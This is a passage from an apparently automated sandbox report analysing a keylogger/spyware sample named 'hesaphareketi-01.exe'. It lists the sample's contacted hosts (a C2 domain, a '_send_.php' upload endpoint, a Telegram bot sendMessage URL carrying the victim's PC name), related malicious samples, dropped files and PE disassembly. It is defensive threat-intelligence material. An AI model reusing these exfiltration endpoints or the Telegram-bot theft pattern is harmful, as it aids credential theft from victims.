                    https://reallyfreegeoip.org/xml/8.46.123.33$hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D99000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://mail.obaambalaj.com.trhesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E84000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    http://anotherarmy.dns.army:8081hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchhesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://checkip.dyndns.org/qhesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://reallyfreegeoip.orghesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.office.com/(hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002EBB000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehesaphareketi-01.exe, 00000000.00000002.1457581741.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedhesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:581804%0D%0ADate%20ahesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://reallyfreegeoip.org/xml/hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D6F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    77.245.159.27
                    mail.obaambalaj.com.trTurkey
                    42868NIOBEBILISIMHIZMETLERITRtrue
                    149.154.167.220
                    api.telegram.orgUnited Kingdom
                    62041TELEGRAMRUtrue
                    193.122.6.168
                    checkip.dyndns.comUnited States
                    31898ORACLE-BMC-31898USfalse
                    188.114.96.3
                    reallyfreegeoip.orgEuropean Union
                    13335CLOUDFLARENETUStrue
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1524785
                    Start date and time:2024-10-03 09:10:14 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 34s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:hesaphareketi-01.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@7/6@4/4
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 119
                    • Number of non-executed functions: 13
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target hesaphareketi-01.exe, PID 5508 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    TimeTypeDescription
                    03:11:17API Interceptor10333676x Sleep call for process: hesaphareketi-01.exe modified
                    03:11:19API Interceptor22x Sleep call for process: powershell.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    149.154.167.220T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          AvQTFKdsST.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                            All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                              hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                zR0pDxPfkZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  WaUjTT0Wa1.exeGet hashmaliciousVIP KeyloggerBrowse
                                    OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                                      hesaphareketi-01.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        193.122.6.168Athnaton_ANP00224_Specification.xlsGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        IEnetbookupdation.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        WIpGif4IRrFfamQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        CANADAXORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        RFQ-00032035.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        Italya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exeGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        SYSN ORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • checkip.dyndns.org/
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        reallyfreegeoip.orgAthnaton_ANP00224_Specification.xlsGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        dllhost.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        IEnetbookupdation.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                        • 188.114.96.3
                                        SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        Price Request 02.10.24.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.97.3
                                        doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        zR0pDxPfkZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.97.3
                                        WaUjTT0Wa1.exeGet hashmaliciousVIP KeyloggerBrowse
                                        • 188.114.97.3
                                        checkip.dyndns.comQUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 158.101.44.242
                                        Athnaton_ANP00224_Specification.xlsGet hashmaliciousSnake KeyloggerBrowse
                                        • 132.226.8.169
                                        dllhost.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 132.226.247.73
                                        IEnetbookupdation.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                        • 193.122.6.168
                                        SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.8.169
                                        Price Request 02.10.24.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 158.101.44.242
                                        doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.247.73
                                        All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.6.168
                                        hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.130.0
                                        zR0pDxPfkZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 132.226.247.73
                                        api.telegram.orgT3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 149.154.167.220
                                        SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        AvQTFKdsST.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 149.154.167.220
                                        All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 149.154.167.220
                                        hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        zR0pDxPfkZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        WaUjTT0Wa1.exeGet hashmaliciousVIP KeyloggerBrowse
                                        • 149.154.167.220
                                        OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                                        • 149.154.167.220
                                        hesaphareketi-01.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ORACLE-BMC-31898USQUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 158.101.44.242
                                        Athnaton_ANP00224_Specification.xlsGet hashmaliciousSnake KeyloggerBrowse
                                        • 158.101.44.242
                                        IEnetbookupdation.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                        • 193.122.6.168
                                        SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 158.101.44.242
                                        Price Request 02.10.24.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 158.101.44.242
                                        All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.6.168
                                        hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 193.122.130.0
                                        WaUjTT0Wa1.exeGet hashmaliciousVIP KeyloggerBrowse
                                        • 158.101.44.242
                                        po110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09IMG .exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 193.122.130.0
                                        zw15EB2406245 Tc ziraat bankasi. referansl#U0131 Emlakpay_323282-_563028621286 .exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 158.101.44.242
                                        TELEGRAMRUT3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 149.154.167.220
                                        tcU5sAPsAc.exeGet hashmaliciousRedLineBrowse
                                        • 149.154.167.99
                                        SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        AvQTFKdsST.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 149.154.167.220
                                        All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 149.154.167.220
                                        hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        zR0pDxPfkZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        WaUjTT0Wa1.exeGet hashmaliciousVIP KeyloggerBrowse
                                        • 149.154.167.220
                                        OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                                        • 149.154.167.220
                                        NIOBEBILISIMHIZMETLERITRhttps://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAILGet hashmaliciousUnknownBrowse
                                        • 77.245.159.9
                                        PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 77.245.148.65
                                        Contract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                        • 77.245.159.9
                                        Contract_Agreement_Tuesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                        • 77.245.159.9
                                        https://bahrioglunakliyat.com.tr/wp-admin/admin-ajax.phpGet hashmaliciousUnknownBrowse
                                        • 77.245.159.21
                                        SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 77.245.159.7
                                        file.exeGet hashmaliciousSystemBCBrowse
                                        • 77.245.149.25
                                        #U0130#U015eLEM #U00d6ZET#U0130_G5024057699-1034 nolu TICARI.exeGet hashmaliciousAgentTeslaBrowse
                                        • 77.245.148.100
                                        SKM_C3350i2402291223.bat.exeGet hashmaliciousAgentTeslaBrowse
                                        • 77.245.148.65
                                        Overdue Account Notice.exeGet hashmaliciousAgentTeslaBrowse
                                        • 77.245.159.10
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        54328bd36c14bd82ddaa0c04b25ed9addllhost.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        IEnetbookupdation.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                        • 188.114.96.3
                                        Price Request 02.10.24.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        doc_20241002_383767466374663543.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        All#att098764576.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        zR0pDxPfkZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 188.114.96.3
                                        WaUjTT0Wa1.exeGet hashmaliciousVIP KeyloggerBrowse
                                        • 188.114.96.3
                                        po110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09IMG .exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        3b5074b1b5d032e5620f69f9f700ff0eQUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 149.154.167.220
                                        sostener.vbsGet hashmaliciousNjratBrowse
                                        • 149.154.167.220
                                        sostener.vbsGet hashmaliciousXWormBrowse
                                        • 149.154.167.220
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 149.154.167.220
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        file.exeGet hashmaliciousAmadey, Credential Flusher, StealcBrowse
                                        • 149.154.167.220
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        MZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                        • 149.154.167.220
                                        No context
                                        Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.34331486778365
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2232
                                        Entropy (8bit):5.379677338874509
                                        Encrypted:false
                                        SSDEEP:48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//8PUyus:tLHxvIIwLgZ2KRHWLOug8s
                                        MD5:0409BC4E22C202C47D580902DAA656F4
                                        SHA1:FF4E4FD1293C724A149AE0A1128D7B02CEFAED17
                                        SHA-256:028122B959E6E45EC84CE434E2266AC3296C0ADAB2A37C391E0DEDFCA1823206
                                        SHA-512:6710C3E7F5822EB83F2C5228117076D73D4785AE7A7121733B5D248D9059BDDF920D750D44717B80D2E1B19E24EC276C9EFCF7DF840E3F8D73F0E1CA35C2E5E3
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.577204816678419
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:hesaphareketi-01.exe
                                        File size:884'736 bytes
                                        MD5:1a2030277b88a72feac4f57f6514494a
                                        SHA1:29858e377f52ba70fad5d3f24c30e2264d96ea96
                                        SHA256:c387b91dd56a4b66da4582e26ebc0c5a473e37251fb44650fc62d6d4749d5c8c
                                        SHA512:15fb1909628f42b05fb23c3d1a492ffd7a1897c63ef1b9d9380c1026b5a02c661cd5ab94d6d56d5d1f942c9172c34de11717bf21650981b7cff788437981ca63
                                        SSDEEP:12288:zTvI+u/WO2QaanbotSUN3o7ifGY4+wZy2jifuNHXSRcEgPKxIYzsT:3vIFSYgp32872lWWtSBgmIYzs
                                        TLSH:95159CC076386B05D97947B19539DDB083B1292AB029F6D60CCAFBFB35A87135A08F47
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G................0..t............... ........@.. ....................................@................................
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x4d92fa
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x90DC47B8 [Sun Jan 6 02:43:04 2047 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
